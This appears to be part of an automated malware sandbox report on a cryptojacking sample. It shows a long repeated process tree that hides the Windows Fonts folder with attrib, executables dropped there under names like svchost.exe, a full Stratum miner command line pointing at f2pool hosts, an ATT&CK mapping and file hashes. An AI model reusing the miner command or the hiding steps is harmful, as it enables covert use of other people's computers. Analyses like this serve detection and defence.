C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1760

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2740

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2700

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2748

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2736

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2800

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2760

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2792

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2836

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2844

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2808

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2860

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2928

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2908

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2916

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2944

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2960

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3012

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2976

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3052

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3008

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1084

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2072

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1240

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:692

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1160

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:268

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1964

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1424

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2088

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:480

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1628

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1556

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1316

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1196

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2100

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1972

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:688

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2104

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1956

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2016

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1736

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1324

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2092

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1288

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:864

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:796

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1228

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:384

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1124

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:948

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1400

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1896

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1756

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1072

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2900

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2148

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2176

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2168

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2224

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2236

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2084

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2124

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2228

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2288

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2316

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2336

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2356

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:952

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2368

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2364

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2396

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1392

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:696

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2060

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1968

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2476

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2500

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2564

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2568

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2208

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2544

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2644

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1200

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1216

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2680

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2656

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2712

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1760

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2732

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2700

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2776

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2736

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2772

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2760

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2788

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2836

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2828

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2808

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2924

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2928

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2980

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2916

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3004

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2960

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3060

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2972

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1084

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3044

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1240

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3040

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1160

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1840

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1964

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2080

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2088

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:520

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1628

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1004

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1316

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1888

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2100

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1280

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:688

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1608

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1504

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1956

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1508

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1704

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1892

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1356

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1324

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1528

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:468

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:968

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:316

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:864

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1592

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:836

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1260

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:796

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1836

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:996

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2596

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1500

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:776

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1960

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1748

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1896

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2028

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1072

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2880

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2896

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2164

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2168

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2220

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2236

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2284

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2124

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2316

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2232

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2356

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2340

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2368

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2156

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2396

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2172

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:696

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1392

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2348

\??\c:\windows\Fonts\rundlls.exe
"rundlls" -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
2⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
1⤵
PID:2460

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Indicator Removal on Host

T1070

Modify Registry

T1112

Hidden Files and Directories

T1158

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tem.vbs
Filesize
215B

MD5
535a478cc80a0fbbf990eed73f8788bb

SHA1
459479dadaf00f3fa0de78f640c34dd426fd61aa

SHA256
323a4134deb72847221aa880fffefe4c191d73bc69b4d246a5e9afb57dba6c51

SHA512
3c96197cc51766f9d28fd69800865c88d015d50713a2aea6d71c097c6f4b0851535790f6adac51064b9b87c68dba268843ebb74a3da372dcc47eb39870ebdad1

Download Submit
C:\Windows\Fonts\conhost.exe
Filesize
2.9MB

MD5
1b9583c6c3eab1da961aec9e42bfbcb8

SHA1
c60f85fa6bcc463b3d38b7714916b241f2139650

SHA256
6260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380

SHA512
0bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4

Download Submit
C:\Windows\Fonts\rundlls.exe
Filesize
5.2MB

MD5
ed499b3a95e11ecf57e5131cd82c2a14

SHA1
7f37e85068457497f5f34e73edde4963694cfc19

SHA256
c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5

SHA512
f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\TEMP\csonhost.bat
Filesize
6KB

MD5
9da29265b1391c18f00c959c64b3fb65

SHA1
dee2f9ded1706933f452ebcd2d5ccd8818af713e

SHA256
fcf3e0486e76ea956d81dedfc64eaeb597ed0459d4356221f8f1e7f18d996824

SHA512
6d9df7132fd07c8de64501d7df5ecc421f801724e6c854952a627aead0702e452fd366e439542e24960415c58145cf99c1231ac41815f7fece394d24a39260e2

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\windows\Fonts\conhost.exe
